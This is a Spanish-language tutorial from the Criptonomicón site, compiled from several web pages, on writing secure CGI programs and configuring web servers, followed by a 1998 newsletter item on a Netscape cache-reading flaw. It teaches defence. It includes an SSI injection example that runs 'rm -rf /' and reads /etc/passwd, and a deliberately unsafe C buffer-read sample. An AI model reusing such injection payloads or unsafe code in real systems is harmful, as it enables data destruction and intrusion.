CGI, si bien suele distinguirse entre programas (programs) y guiones (scripts). Los
primeros se consideran escritos en algn lenguaje compilado como C, mientras que
los segundos son los escritos en un lenguaje interpretado como Perl. Ms adelante
discutiremos las ventajas e inconvenientes desde el punto de vista de la seguridad
que plantea cada una de las dos formas de escribir las aplicaciones en CGI
(programas o guiones).
En general, es necesaria la presencia de dos elementos, una pgina Web en formato
HTML con un formulario donde el usuario introduce sus datos, y un programa CGI
en el servidor, que recibe y procesa los datos del usuario.
En la siguiente pgina se muestra desde una perspectiva de alto nivel cmo funciona
el mecanismo de entrega y procesamiento de datos en un programa CGI.

Copyright 1997-1998 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.

file:///C|/TEMP/criptonomicon/criptonomicon/cgi/quescgi.html [25/10/2000 02:32:30 p.m.]

Dnde est el riesgo en CGI

Qu es CGI

Riesgos de CGI

CGIs seguros

SSI

Consejos

Recursos

Dnde est el riesgo


Cuando los usuarios envan un formulario o invocan un CGI de
Peligros
alguna otra forma, en definitiva se les est permitiendo ejecutar
remotamente un programa en el servidor. Es ms, puesto que la
Vulnerabilidad
mayora de CGI's aceptan datos de la entrada de usuario (bien
despus de rellenar un formulario o directamente desde la lnea de
SSI
URL), en esencia se les brinda a los usuarios la oportunidad de
controlar cmo se ejecutar el CGI, de manera que podran
Llamada a programas
intentar la introduccin de una serie de parmetros inesperados
hbilmente manipulados para que el CGI funcionase maliciosamente.

Copyright 1997-1998 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.

file:///C|/TEMP/criptonomicon/criptonomicon/cgi/riesgos.html [25/10/2000 02:32:30 p.m.]

Objetivos al escribir CGIs

Qu es CGI

Riesgos de CGI

CGIs seguros

SSI

Consejos

Recursos

Objetivos
Visto cules son los riesgos a que atenerse, los objetivos que nos
guiarn a la hora de escribir CGI's seguros se resumen en los
siguientes:
Los programas SOLAMENTE deben ejecutar aquellas
acciones para las que ha sido concebido.
No se debe revelar ms informacin al cliente que la que
DELIBERADAMENTE se desee suministrar.
No se debe confiar en la informacin procedente de los
datos introducidos por el cliente.
Se debe minimizar el dao potencial al sistema en su
conjunto si se produce un ataque con xito.
Iremos viendo a continuacin de forma ms detallada cmo hacer
para que nuestros CGI's cumplan con los objetivos impuestos.

Objetivos

Servidor

Usuario

Lenguajes

Caminos y nombres

Llamada a programas

Envo de datos

Copyright 1997-1998 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.

file:///C|/TEMP/criptonomicon/criptonomicon/cgi/seguros.html [25/10/2000 02:32:31 p.m.]

Consejos y orientaciones

Qu es CGI

Riesgos de CGI

CGIs seguros

SSI

Consejos

Recursos

Consejos y Orientaciones
Cmo decir si un CGI es seguro
1.
2.
3.
4.
5.
6.

Es muy complejo?
Lee o escribe ficheros en el servidor?
Interacta con otros programas del sistema?
Corre con privilegios suid?
Se valida la entrada procedente de formularios?
Se emplean nombres de camino explcitos?

Preguntas tomadas de la FAQ sobre seguridad en WWW.

A evitar

Nunca se debe pasar como argumento a un comando del shell la entrada del
usuario sin filtrarla antes.
Ni siquiera se puede confiar en las variables de entorno.
No revelar demasiada informacin sobre el sistema, con servicios como:
finger
w
ps
En lenguajes compilados, evitar suposiciones acerca del tamao de la entrada
del usuario, ya que en caso contrario pueden ocurrir desbordamientos de bfer.

No fiarse de los campos ocultos


Los campos ocultos se denominan as porque no se visualizan en la pantalla del
navegador, pero s se ven si se lista el cdigo fuente en HTML de la pgina. Por lo
tanto, cualquiera puede cargar la pgina en su disco local y editarla, modificando los
valores de los campos ocultos. En consecuencia, nunca se deben utilizar para
contener informacin confidencial ni confiar en ellos para almacenar informacin
sensible (como precio de un producto). El servidor deber contrastar la informacin
file:///C|/TEMP/criptonomicon/criptonomicon/cgi/consejos.html (1 of 2) [25/10/2000 02:32:32 p.m.]

Consejos y orientaciones

recibida procedente de los campos ocultos.

No fiarse del lugar de ejecucin


Como ya se ha dicho, los CGI's no tienen por qu ejecutarse necesariamente desde el
formulario donde aparecen. Pueden mandarse ejecutar directamente desde la ventana
de URL, por lo que podran faltar parmetros o estar manipulados.

Consejos de Lincoln Stein

Copyright 1997-1998 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.

file:///C|/TEMP/criptonomicon/criptonomicon/cgi/consejos.html (2 of 2) [25/10/2000 02:32:32 p.m.]

Recursos sobre Seguridad en CGI

Qu es CGI

Riesgos de CGI

CGIs seguros

SSI

Recursos sobre Seguridad en CGI


A continuacin cito los recursos que he utilizado como fuentes para esta seccin
sobre CGI y otros que me han parecido interesantes.

CGI (Server) Scripts

Consejos

Captulo de la FAQ sobre seguridad en WWW de Lincoln Stein, dedicado a CGI.


Excelente.

Recursos

CGI Security
Captulo 9 del libro CGI Developer's Guide por Eugene Eric Kim.

CGI Security Compilation


Extensa compilacin de textos sobre seguridad en CGI, con ejemplos en C y Perl.

CGI Security Tutorial


Completo curso sobre seguridad en CGI.

Security Issues When Installing and Customizing Pre-Built Web


Scripts
Recomendaciones a tener en cuenta cuando se instalan guiones CGI en nuestro
servidor.

Are You Safe?


Algunas ideas sobre seguridad en el servidor y tambin en CGI.

Writing secure CGI scripts


Algunos breves consejos a la hora de escribir guiones CGI.

CGI Security
Coleccin de punteros a recursos sobre seguridad en CGI.

file:///C|/TEMP/criptonomicon/criptonomicon/cgi/recursos.html (1 of 2) [25/10/2000 02:32:32 p.m.]

Recursos sobre Seguridad en CGI

The CGI Collection: Security


Ms punteros a recursos sobre el tema.

The CGI Resource Index: Documentation: Security


Ms punteros a recursos sobre el tema.

Yahoo! Search Results


Resultado de buscar en Yahoo. Algn sitio siempre puede resultar interesante.

Copyright 1997-1998 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.

file:///C|/TEMP/criptonomicon/criptonomicon/cgi/recursos.html (2 of 2) [25/10/2000 02:32:32 p.m.]

Ejemplos de mala y buena programacin en CGI

Ejemplos de mala y buena programacin


Ejemplo de mala programacin
#include <stdlib.h>
#include <stdio.h>
static char query_string[1024];
char* read_POST() {
int query_size;
query_size = atoi( getenv( "CONTENT_LENGTH" ) );
fread( query_string,query_size,1,stdin );
return query_string;
}

Ejemplo mejorado
char* read_POST() {
int query_size = atoi( getenv( "CONTENT_LENGTH" ) );
char* query_string = (char*) malloc( query_size );
if (query_string != NULL)
fread( query_string, query_size, 1, stdin);
return query_string;
}

Ejemplo de manejo de cadenas


#define MAXSTRINGLENGTH 255
char myString[MAXSTRINGLENGTH + sizeof('\0')];
char* query = read_POST();
assert( query != NULL );
strncpy( myString, query, MAXSTRINGLENGTH );
myString[MAXSTRINGLENGTH]='\0';
Volver a CGI

Copyright 1997-1998 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre privacidad, por favor consulte la
declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de visitas. Para contribuir al Criptonomicn, lea la pgina de
contribuciones.

file:///C|/TEMP/criptonomicon/criptonomicon/cgi/ejprog.html [25/10/2000 02:32:32 p.m.]

Consejos y orientaciones

Qu es CGI

Riesgos de CGI

CGIs seguros

SSI

Consejos

Recursos

Consejos de Lincoln Stein


Consejos de sentido comn para administradores cuando instalen CGI's desarrollados
por terceros:
1. No ejecutar nunca guiones en CGI con ms privilegios de los que necesiten.
Generalmente, ejecutarlos como el usuario con menos privilegios del sistema.
2. Siempre que sea posible, ejecutar los CGI en un entorno set-user-id,
aislndolos del resto del sistema de ficheros.
3. Establecer lmites de recursos, de manera que un CGI pobremente escrito no
pueda utilizar cantidades irrazonables de memoria, CPU o espacio en disco.
Algunos consejos para desarrolladores de CGI:
1. No copiar nunca datos introducidos por el usuario en bferes estticos.
2. Comprobar siempre la longitud de las cadenas antes de manipularlas.
3. No pasar nunca sin comprobarlos antes datos recibidos del exterior (por
ejemplo, la cadena de consulta) a un comando del shell.
4. No usar nunca sin comprobarlos antes datos recibidos del exterior para
seleccionar un nombre de fichero para su apertura.
5. Comprobar el cdigo de retorno de todas las llamadas al sistema.
6. No hacer suposiciones acerca del directorio de trabajo actual, el entorno o el
camino de ejecucin de comandos.

Copyright 1997-1998 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.

file:///C|/TEMP/criptonomicon/criptonomicon/cgi/stein.html [25/10/2000 02:32:33 p.m.]

Peligros de los Server Side Includes

Qu es CGI

Riesgos de CGI

CGIs seguros

SSI

Peligros
En la prctica, los Server-Side Includes permiten toda clase de
trucos cuando se combinan con CGIs que modifican pginas
Web, como en el escenario del libro de visitas: los visitantes a una
pgina disponen de un "libro" en el que pueden dejar un texto, que
en principio podra incluir etiquetas en HTML y tambin, si la
entrada no se filtra, includes como los siguientes:

Qu son

Peligros
Soluciones

Consejos

<!--#exec cmd="rm rf /;cat /etc/passwd" -->


Recursos

<!--#include file="archivo_secreto" -->

Copyright 1997-1998 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.

file:///C|/TEMP/criptonomicon/criptonomicon/cgi/ssipel.html [25/10/2000 02:32:33 p.m.]

Soluciones a los peligros de los Server Side Includes

Qu es CGI

Soluciones

Riesgos de CGI

Existen varias soluciones para paliar estas amenazas.

Qu son

La ms drstica pasa por deshabilitar completamente los SSI del


servidor.

Peligros

CGIs seguros

SSI

Consejos

Recursos

Otra solucin menos drstica consiste en deshabilitar


especficamente la ejecucin de comandos con exec.

Soluciones

Otra posibilidad es utilizar como archivos con SSI slo los que posean una extensin
determinada, como por ejemplo .shtml. De esta forma, mientras las pginas posean
extensin .html no existe riesgo de ataque mediante fallos en CGI, ya que se limitan
a los archivos con extensin .shtml.
En el caso del libro de visitas, para que el ataque tenga xito, el libro debera tener
extensin .shtml, lo cual resulta muy improbable.
Por ltimo, se pueden mantener los SSI y velar en los programas CGI por que no se
produzcan entradas indeseadas, filtrando caracteres como ;, <, >, , -, #, @, , `, /, etc.

Copyright 1997-1998 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.

file:///C|/TEMP/criptonomicon/criptonomicon/cgi/ssisol.html [25/10/2000 02:32:33 p.m.]

Cmo configurar el servidor

Qu es CGI

Riesgos de CGI

CGIs seguros

Cmo configurar el servidor

SSI

Cmo correr el servidor

Consejos

Recursos

Cuando se ejecuta un CGI, corre con el UID del propio servidor


Web, lo cual significa que un CGI con errores permitira a un
atacante correr otros programas con el UID del servidor. En estas
circunstancias, resulta evidente que el servidor Web nunca deber
correr como root. Aunque el servicio de Web, tpicamente en el
puerto 80, debe ser iniciado por el root, el fichero http.conf
no debera contener la lnea "User root". Si lo hiciera, entonces
cualquier guin que se ejecutase en el servidor Web lo hara como
el superusuario, con los riesgos que eso conllevara.

Objetivos

Servidor

Usuario

Lenguajes

Caminos y nombres

Llamada a programas

Una solucin comn es correr el servidor como el usuario


Envo de datos
genrico nobody, que carece de privilegios. Si bien representa una
mejora respecto a root, el incoveniente que presenta es que otros procesos corren
asimismo como nobody, por lo que todos gozaran de los mismos privilegios. En su
lugar, es ms conveniente correr el servidor como un usuario real, por ejemplo www,
perteneciendo al grupo www.

Dnde poner los CGI


Existen dos prcticas generalizadas. La primera de ellas, y ms recomendable,
consiste en designar un nico directorio donde se almacenarn todas las aplicaciones
en CGI, tpicamente el directorio cgi-bin, con privilegios limitados, de manera
que los usuarios locales no puedan instalar, eliminar ni editar programas. Por el
contrario, la segunda permite la ejecucin de cualquier fichero con la extensin, p.e.,
.cgi como un programa CGI, lo cual lo considero desconsejable. La primera
prctica presenta las siguientes ventajas:
Facilidad de seguir la pista a los CGI's, especialmente en servidores con
muchos usuarios, con capacidad de escribir sus propios CGI's. Si cada uno los
almacenase en su propio directorio y se produjera una brecha de seguridad,
sera ms difcil localizar al culpable.
Proteccin frente a hackers creando sus propios CGI's, ya que aunque puedan
file:///C|/TEMP/criptonomicon/criptonomicon/cgi/servidor.html (1 of 2) [25/10/2000 02:32:34 p.m.]

Cmo configurar el servidor

acceder a la cuenta de un usuario no gozarn de privilegios para poner su


propio CGI, cosa que s podran hacer si se ejecutasen como CGI los
programas de una extensin determinada.
Permite borrar de golpe y cmodamente todas las copias de seguridad, ya que
estn agrupadas en un nico directorio y no hay que rastrearlas por todo el
servidor.
Impide que se puedan leer las copias de seguridad, ya que al ser la poltica el
ejecutar cualquier fichero el directorio cgi-bin, las copias de seguridad
tambin se ejecutarn. En el otro caso, al ejecutarse slo los ficheros con
determinada extensin, las copias de seguridad se recuperaran como un
fichero de texto, lo que permitira a un atacante estudiarlas en busca de
debilidades.

Copyright 1997-1998 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.

file:///C|/TEMP/criptonomicon/criptonomicon/cgi/servidor.html (2 of 2) [25/10/2000 02:32:34 p.m.]

Nunca fiarse del usuario

Qu es CGI

Riesgos de CGI

CGIs seguros

SSI

Consejos

Recursos

Nunca fiarse del usuario


Uno de los medios de ataque ms utilizados por los hackers
consiste en enviar parmetros a un programa, de manera que no
pueda procesarlos y entre en un estado inestable o bien ejecute
acciones indeseadas.

Objetivos

Servidor

Usuario
El ejemplo ms explotado en el mundo de los CGI es la
manipulacin de formularios: los formularios normalmente
Lenguajes
presentan una serie de campos dentro de los cuales se puede
escribir texto, as como listas desplegables, botones de seleccin,
Caminos y nombres
etc. Un error muy comn entre los programadores novatos
consiste en asumir que la entrada del programa CGI provendr de
Llamada a programas
los datos rellenados por el usuario a partir del formulario. Sin
embargo, resulta muy sencillo cargar en el disco local la pgina
Envo de datos
HTML con el formulario y manipularla a voluntad (por ejemplo
variando los campos ocultos), o bien directamente introducir los datos manipulados
en la ventana del URL, modificando los argumentos esperados por el CGI. Por lo
tanto, debe tenerse en cuenta lo siguiente:
Si se crea una lista de seleccin, la entrada de ese campo puede no ser una de
las opciones de la lista.
Si se especifica la mxima longitud de un campo, el usuario podra enviar ms
caracteres de los prefijados, manipulando el formulario o invocando al CGI
directamente.
Los campos que el CGI espera encontrar en la variable QUERY_STRING
podran ser distintos de los presentados por el formulario, ya que el usuario los
puede alterar, aadiendo o borrando campos.
Los valores de las variables de entrada al CGI podran contener caracteres
especiales, como <, >, , -, #, @, ', `, /, etc. Esto incluye a variables de entorno
como el HTTP_REFERER, nombre de host, direccin de host, etc.

El usuario puede ver los datos presentes en campos ocultos.


Si se utilizan cookies para mantener el estado de la sesin en el servidor, el
programa CGI podra recibir cookies que nunca cre.

file:///C|/TEMP/criptonomicon/criptonomicon/cgi/usuario.html (1 of 2) [25/10/2000 02:32:34 p.m.]

Nunca fiarse del usuario

Por supuesto, no hay que olvidar de vista el problema de las llamadas a programas
manipuladas, como veremos ms adelante.

Copyright 1997-1998 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.

file:///C|/TEMP/criptonomicon/criptonomicon/cgi/usuario.html (2 of 2) [25/10/2000 02:32:34 p.m.]

Qu lenguaje utilizar

Qu es CGI

Riesgos de CGI

CGIs seguros

SSI

Consejos

Recursos

Qu lenguaje utilizar
A menudo se plantea la discusin de qu lenguaje resulta el ms
Objetivos
adecuado a la hora de escribir CGI's seguros. En una primera
aproximacin, puede considerarse a los lenguajes compilados
Servidor
como ms seguros por las siguientes razones:
Usuario
Impiden el acceso remoto al cdigo fuente del CGI, lo cual
limita las posibilidades de un hacker de conocer cmo
Lenguajes
funciona internamente el programa.
Los guiones escritos en lenguajes interpretados son ms
Caminos y nombres
complejos y propensos a errores cuando crecen,
aumentando la probabilidad de que contengan agujeros de
Llamada a programas
seguridad.
Los lenguajes interpretados facilitan la labor de abrir shells,
Envo de datos
ejecutar comandos y capturar sus resultados, lo que
constituye uno de los mayores riesgos potenciales de los CGI's. Por el
contrario, en C supone un esfuerzo mayor invocar comandos del sistema y es
ms difcil que la entrada del usuario engae al programa.
No obstante, no hay que olvidar que los lenguajes interpretados son ms sencillos de
entender y rpidos de probar (ya que no necesitan pasar por todo el proceso de
compilacin y enlazado), y adems su manejo de cadenas es mucho ms sofisticado,
lo que los hace menos propensos a errores con bferes de texto.

Copyright 1997-1998 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.

file:///C|/TEMP/criptonomicon/criptonomicon/cgi/lenguaje.html [25/10/2000 02:32:34 p.m.]

Caminos y nombres de ficheros

Qu es CGI

Riesgos de CGI

CGIs seguros

Caminos y nombres de ficheros

SSI

Caminos

Consejos

Recursos

No se debe confiar en los caminos contenidos en la variable PATH


a la hora de ejecutar ciertas acciones, ya que esa variable podra
contener cualquier cosa, truco comnmente usado por atacantes
para que la variable apunte al programa que desean que sea
ejecutado por el CGI en lugar del esperado. Por este motivo es
mejor utilizar caminos completos.
En su defecto, si se necesitan caminos relativos, se puede
especificar el valor de la variable PATH al principio del CGI.
Por idnticas razones, es conveniente no aadir "." en el camino.

Nombres de ficheros

Objetivos

Servidor

Usuario

Lenguajes

Caminos y nombres

Llamada a programas

Envo de datos

Presumiblemente, los nombres de ficheros que aparecen codificados en el programa


CGI son seguros, siempre que no se usen caminos relativos (los servidores NT no
permiten caminos relativos). Por esta razn no se debe confiar en las variables PATH
o PATH_INFO. Tambin se puede considerar el prohibir caracteres como "..", para
evitar que se puedan producir ataques que obliguen a abrir archivos confidenciales
(v. ejemplo). Asimismo, suele constituir una buena prctica el asegurarse de que los
archivos creados son los que se pretenda crear.
Si el programa CGI maneja datos confidenciales, suele convenir no utilizar el
directorio /tmp, ya que podra quedar en l informacin valiosa.

Copyright 1997-1998 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.

file:///C|/TEMP/criptonomicon/criptonomicon/cgi/caminos.html [25/10/2000 02:32:34 p.m.]

Llamada a progamas

Qu es CGI

Riesgos de CGI

CGIs seguros

SSI

Consejos

Recursos

Llamada a progamas
Una de los aspectos ms potentes de la programacin en CGI es la
capacidad de las aplicaciones de invocar utilidades del sistema u
otros programas, con la posibilidad de capturar su salida. Sin
embargo, desgraciadamente, esta libertad puede convertirse en un
arma de doble filo, ya que resulta igualmente sencillo subvertir los
argumentos de esos comandos, de manera que se produzcan
acciones inesperadas e indeseables.
Dependiendo del lenguaje de programacin empleado, existen
varias formas de invocar comandos:
En C, las funciones popen( ) y system( ) sirven para abrir un shell
que procese los comandos que se le pasen como argumentos. Por
su parte, en Perl, adems de las funciones anteriores, se dispone
de open( ) con tubera, exec( ) y eval( ), as como de las comillas
hacia atrs "`".

Objetivos

Servidor

Usuario

Lenguajes

Caminos y nombres

Llamada a programas

Envo de datos

En la medida de lo posible se debe evitar abrir un subshell, pero en el caso de que


fuera estrictamente necesario, ya que las acciones requeridas no se pueden realizar
usando las capacidades del lenguaje de programacin, entonces se debe evitar pasar
como argumentos al proceso la entrada del usuario. Desgraciadamente, esto tambin
es inevitable, por lo que se deber filtrar la entrada que suministra, en busca de
metacaracteres como `$|;>*<& ['\]"( ~?)\n\r.
No obstante, suele resultar ms conveniente especificar una lista de caracteres
permitidos que de caracteres peligrosos, ya que si te olvidas de especificar un
carcter, no ocurre nada desastroso; mientras que si te olvidas de especificar un
carcter peligroso, como los retornos de carro, se puede comprometer la seguridad de
todo el sistema. Podis comprobar los peligros de no filtrar las entradas
convenientemente con un ejemplo muy ilustrativo.

Copyright 1997-1998 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.

file:///C|/TEMP/criptonomicon/criptonomicon/cgi/programas.html (1 of 2) [25/10/2000 02:32:35 p.m.]

Llamada a progamas
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.

file:///C|/TEMP/criptonomicon/criptonomicon/cgi/programas.html (2 of 2) [25/10/2000 02:32:35 p.m.]

Cmo enviar los datos

Qu es CGI

Riesgos de CGI

CGIs seguros

SSI

Consejos

Recursos

Cmo enviar los datos


GET y POST son dos mtodos empleados para enviar los datos de
los formularios desde el navegador al servidor Web, especificados
mediante la directiva METHOD. La principal diferencia entre
POST y GET es que el CGI recibir los datos enviados con POST
leyendo la entrada estndar, mientras que los enviados con GET
se recibirn por lneas de comandos y la variable de entorno
QUERY_STRING. Desde un punto de vista puramente prctico,
debido a que muchos sistemas operativos ponen lmite a la
longitud de la lnea de comandos, suele ser mejor usar POST,
reservando GET para formularios con pocos datos.

Objetivos

Servidor

Usuario

Lenguajes

Caminos y nombres

Desde el punto de vista de la seguridad la verdad es que da igual Llamada a programas


uno u otro, si bien las peticiones enviadas mediante GET quedan
Envo de datos
registradas en los ficheros de registro, con todos sus argumentos,
por lo que si se enviase informacin confidencial sin cifrar, estos datos quedaran en
el fichero log, donde a lo mejor alguien no autorizado podra husmear
posteriormente. O lo que es peor, agujeros como el que descubri Brumleve en
Netscape, exponen el cache, con toda la informacin que almacena, como todos los
URLs que han sido solicitados, por supuesto con los datos con que se rellenaron los
formularios, como podra suceder con el nmero de la tarjeta de crdito.
Accin
Aade los datos con que se rellena el formulario al URL solicitado?
Limitado en la cantidad de datos que se pasan al URL solicitado?
Usado tpicamente fuera de formularios HTML?
Utiliza la variable de entorno QUERY_STRING del servidor?
Enva los datos al URL solicitado en una transaccin separada con el
servidor?
Utiliza las variables del servidor CONTENT-TYPE y
CONTENT-LENGTH?
Puede escribir datos en el servidor?
Tabla comparativa entre GET y POST
file:///C|/TEMP/criptonomicon/criptonomicon/cgi/datos.html (1 of 2) [25/10/2000 02:32:35 p.m.]

GET POST
S
N
S
N
S
N
S
N
N

Cmo enviar los datos

Copyright 1997-1998 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.

file:///C|/TEMP/criptonomicon/criptonomicon/cgi/datos.html (2 of 2) [25/10/2000 02:32:35 p.m.]

file:///C|/TEMP/criptonomicon/criptonomicon/boletines/boletin20.txt

Boletn del Criptonomicn


Ao I, n 20
1 de octubre de 1998
******************************************
Un nuevo da, un nuevo agujero de seguridad.
Parece que ltimamente obtener material para mantener a los navegantes
informados acerca de agujeros y fallos de seguridad no representa ningn
problema, ya que si no cada da, al menos s cada semana, se van
descubriendo nuevas e importantes brechas. Qu est ocurriendo? Los
programas son muy complejos? Los usuarios son muy inteligentes y
hbiles a la hora de escribir programas y guiones que exploten las
debilidades de las aplicaciones? S, desde luego, algo de ambas, pero
no ser ms bien que en la desenfrenada carrera por ser el lder del
mercado e incorporar lo ltimo en tecnologa Web se pasan por alto los
controles ms elementales de seguridad y salvaguarda de la intimidad? En
una Red en la que las fronteras del propio individuo tienden a
difuminarse y donde el ordenador acta como una ventana abierta al
mundo, la informacin no slo est al alcance de un click de ratn, sino
que nuestra propia informacin privada se encuentra igualmente al
alcance de otras mquinas conectadas a la Red. En este preocupante
contexto, es nuestro deber reclamar una Red ms segura, donde se haga un
uso mayor de la criptografa. Debemos dejar bien claro que no nos fiamos
de los programas hasta que no utilicen criptografa fuerte e incorporen
otras medidas de seguridad suficientemente comprobadas. En una Red sin
fronteras, la criptografa es la nica barrera entre ellos y nuestra
intimidad.
*******************************************
En este boletn:
1.
2.
3.
4.
5.
6.
7.

La navegacin por Internet, al descubierto


Mster de Especialista en Criptografa en la UCM
Technotronic: la tecnologa al servicio de qu?
Una red libre
Cifrador de ficheros para Windows
Fe de erratas
Informacin sobre suscripcin y cmo borrarse

******************************************
1. La navegacin por Internet, al descubierto
La semana pasada fue hallado un nuevo agujero de seguridad en el
navegador de Netscape por Dan Brumleve, un consultor informtico
independiente de Sunnyvale, California, de 20 aos de edad. Anunci su
descubrimiento en un mensaje enviado a los grupos de news
(http://www.shout.net/~nothing/cache-cow/article.txt): un fallo en la
implementacin de JavaScript del navegador de Netscape que permite que
cualquiera pueda leer los contenidos de tu cach, donde se almacenan las
direcciones de los sitios Web que has visitado e incluso la informacin
confidencial que hayas introducido en los formularios, como passwords,
tarjetas de crdito y otros datos personales, siempre y cuando no hayan
sido protegidos utilizando un software criptogrfico. La amenaza a la
intimidad personal que representa este fallo es tremenda, ya que, en
cierto sentido, el cach almacena la informacin de lo que has estado
haciendo en la Web durante las ltimas semanas (la mayor o menor
cantidad de informacin depender del tamao del cach, configurable por
el usuario) y gracias al agujero podra caer en manos poco escrupulosas.
Podis comprobar qu contiene exactamente el cach escribiendo
about:cache o about:global en el recuadro de direccin del

file:///C|/TEMP/criptonomicon/criptonomicon/boletines/boletin20.txt (1 of 5) [25/10/2000 02:32:35 p.m.]

file:///C|/TEMP/criptonomicon/criptonomicon/boletines/boletin20.txt

navegador.
El fallo afecta a todas las versiones del navegador de Netscape
anteriores a la 4.06, pero no a Microsoft Internet Explorer.
Netscape confirm la existencia del fallo y anunci que lo solucionara
cuando lanzase la versin final de Netscape Communicator 4.5, lo cual
ocurrir muy pronto.
En sus declaraciones a la prensa, Brumleve afirm que este fallo le
preocupa porque significa que un sitio Web de elevado trfico podra
utilizarlo para averiguar a qu otros sitios Web van sus visitantes.
Dijo que incluso podra ser utilizado por los jefes para comprobar si
sus empleados han estado buscando pornografa, por ejemplo.
Richard M. Smith, director de Phar Lap Software Inc.
(http://www.pharlap.com/), sugiri que el fallo podra ser explotado
incluso usando correos en formato HTML o mensajes a grupos de noticias
como Usenet, aumentando as significativamente el riesgo para la
intimidad de los usuarios de Internet.
En palabras de Marc Rotenberg, director de Electronic Privacy
Information Center (http://www.epic.org), es ste un problema muy serio
de privacidad, que pone de relieve la actual falta de estndares
tcnicos adecuados para proteger la privacidad en lnea.
Solucin
Ahora mismo, y mientras Netscape no lance un parche, existen dos nicas
maneras de protegerse:
a) Desactivar JavaScript del navegador:
Seleccionar Editar-->Preferencias-->Avanzadas y ah eliminar la confirmacin
de la casilla Activar JavaScript.
b) Establecer el valor del cach a 0:
Seleccionar Editar-->Preferencias-->Avanzadas-->Cach y ah establecer los
valores de cach de memoria y de disco a 0 (ah, y no olvides pulsar los
botones de limpiar cach de memoria y limpiar cach de disco).
No es necesario desactivar Java, ya que este fallo no tiene nada que ver
con ese otro lenguaje.
Ms informacin
La pgina Web creada por el propio Brumleve para demostrar su
funcionamiento, con ejemplos y explicaciones, as como el cdigo fuente
para reproducirlos, disponible en:
http://www.shout.net/~nothing/cache-cow/
(Mi agradecimiento a Manuel Porras por llamar mi atencin sobre la noticia)
******************************************
